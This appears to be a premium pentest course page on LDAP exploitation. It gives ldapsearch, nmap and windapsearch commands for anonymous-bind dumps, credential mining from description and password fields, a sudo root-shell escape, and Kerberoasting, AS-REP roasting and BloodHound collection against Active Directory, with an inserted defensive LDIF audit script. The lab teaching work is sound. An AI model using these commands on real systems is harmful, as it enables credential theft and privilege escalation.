⭐ Premium Path · Protocol Exploitation

LDAP Exploitation Mastery

Two modules. Anonymous bind to Active Directory compromise. Extract users, credentials, and attack paths directly from the directory — no GUI, no BloodHound required for the basics.

2 Modules · 3 Machines · Premium

The LDAP Attack Methodology

From root DSE query to directory-assisted privilege escalation.

Phase 1 — Discovery

LDAP listens on TCP/389 (LDAPS on TCP/636). The root DSE query requires no authentication and reveals the server's advertised configuration: naming contexts (the base DN), supported LDAP versions, SASL mechanisms and controls.

nmap -p 389,636 --script \
  ldap-rootdse TARGET

Phase 2 — Anonymous Bind

Many LDAP servers allow anonymous bind. Where they do, the full directory tree is readable without credentials: users, groups, OUs, and service accounts.

ldapsearch -x -H ldap://TARGET \
  -b '' -s base namingContexts
ldapsearch -x -H ldap://TARGET \
  -b 'dc=lab,dc=local' \
  '(objectClass=*)'

Phase 3 — Credential Mining

Description fields routinely contain passwords set by administrators. ldapsearch prints values it cannot show as plain text with a double colon (userPassword::) and base64 encoding; once decoded, the value may be a clear-text password or a hashed one (such as a {SSHA} value), so decode before judging.

grep -i 'userpassword\|description' \
  /tmp/ldap_dump.txt
echo 'BASE64==' | base64 -d

Phase 4 — Escalation

SSH with extracted credentials, then check sudo. LDAP machines in this path use known GTFOBins sudo vectors.

ssh USERNAME@TARGET
sudo -l
# sudo ruby -e 'exec "/bin/bash"'
cat /root/root.txt

The Two Modules

Module 1 covers standalone LDAP. Module 2 covers Active Directory LDAP at scale.

Module 1 · 🌳

LDAP — Anonymous Enumeration & Credential Dump

LDAP anonymous bind exposes the entire directory tree — users, groups, OUs, service accounts, and sometimes password hashes or clear-text passwords stored in description fields. ldapsearch is the Swiss Army knife; know it cold.

  • nmap --script ldap-rootdse TARGET (get base DN, naming contexts, schema)
  • ldapsearch -x -H ldap://TARGET -b '' -s base (anonymous bind, root DSE query)
  • ldapsearch -x -H ldap://TARGET -b 'dc=lab,dc=local' '(objectClass=*)' (dump all objects)
  • ldapsearch -x -H ldap://TARGET -b BASE '(objectClass=person)' (users only)
  • ldapsearch -x -H ldap://TARGET -b BASE '(objectClass=group)' (groups only)
  • ldap-search NSE: nmap --script ldap-search --script-args ldap.base=BASE TARGET
  • Parsing description fields for passwords: ldapsearch ... | grep -i 'desc\|pass\|pwd'
  • windapsearch.py --dc-ip TARGET --full (AD-aware LDAP enum)
  • enum4linux-ng -L TARGET (LDAP via enum4linux-ng, auto base-DN discovery)
Tools: ldapsearch, nmap, windapsearch, enum4linux-ng
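The credential-mining step in Phase 3 and the description-parsing bullet above both come down to reading an LDIF dump. As an added defensive example, not part of this course's material, the script below parses LDIF the way ldapsearch prints it (folded continuation lines, base64 "::" values) and flags what a directory owner should clean up before anyone with anonymous bind finds it: userPassword values that are not a recognised hash scheme, and description fields that look like they carry a password. The sample LDIF is constructed, not taken from a real directory.

```python
import base64
import re

# Constructed LDIF in the shape `ldapsearch -x -b BASE` prints; not from a real directory.
SAMPLE_LDIF = """\
dn: uid=svc_backup,ou=people,dc=lab,dc=local
description: temporary account, password is Summer2024!
userPassword:: UGFzc3dvcmQxMjM=

dn: uid=jdoe,ou=people,dc=lab,dc=local
description: Accounts payable, desk 4B, extension 22
 15
userPassword: {SSHA}placeholder-hash-not-a-real-digest
"""

PASSWORD_HINT = re.compile(r"pass(word)?|pwd|\bpw\b|cred", re.IGNORECASE)
HASHED_SCHEME = re.compile(r"^\{(SSHA|SHA|CRYPT|MD5|SMD5|PBKDF2|ARGON2)[^}]*\}")
SECRET_ATTRS = {"userpassword", "unicodepwd"}   # attributes that must never hold clear text

def parse_ldif(text):
    """Return [(dn, {attr: [values]})]; attribute names are lower-cased."""
    entries, current = [], None
    # LDIF folds long values as "\n " (newline + one space): join them before splitting.
    for line in re.sub(r"\n ", "", text).splitlines() + [""]:
        if not line:                              # blank line (or end of input) ends an entry
            if current:
                entries.append(current)
            current = None
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):                 # "attr:: <base64>" per the LDIF spec
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if attr.lower() == "dn":
            current = (value, {})
        elif current is not None:
            current[1].setdefault(attr.lower(), []).append(value)
    return entries

def audit_entries(entries):
    """(dn, attr, value) triples to review: unhashed secrets or password-like descriptions."""
    findings = []
    for dn, attrs in entries:
        for attr, values in attrs.items():
            for v in values:
                if (attr in SECRET_ATTRS and not HASHED_SCHEME.match(v)) or (
                        attr == "description" and PASSWORD_HINT.search(v)):
                    findings.append((dn, attr, v))
    return findings
```

Run it over `ldapsearch -x -H ldap://SERVER -b BASE > /tmp/ldap_dump.txt` output of your own directory; every finding is an entry to fix, and an anonymous bind that returns any of them is a finding in itself.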
Premium Content: hands-on assignments for this module are available to Premium members.
Module 2 · 🏢

LDAP — Active Directory Exploitation

Active Directory is built on LDAP. Once you have any domain credentials, the entire AD structure is readable. Learn to extract service accounts, group memberships, and escalation paths directly from LDAP — no GUI required.

  • Authenticated LDAP dump: ldapsearch -x -H ldap://TARGET -D 'cn=USER,dc=corp,dc=local' -w PASS -b BASE
  • AD user attributes: sAMAccountName, userPrincipalName, memberOf, description, pwdLastSet
  • Find accounts with SPNs (Kerberoasting targets): '(servicePrincipalName=*)'
  • Find accounts with DONT_REQ_PREAUTH (AS-REP roasting): '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'
  • windapsearch.py --domain-users / --da / --computers
  • ldapdomaindump: automated AD LDAP dump to HTML/JSON/greppable formats
  • BloodHound Python: python3 bloodhound.py -d DOMAIN -u USER -p PASS -dc DC_IP
  • Correlating LDAP user list with SMB share access and SSH credential attempts
Tools: ldapsearch, windapsearch, ldapdomaindump, bloodhound-python
Premium Content: hands-on assignments for this module are available to Premium members.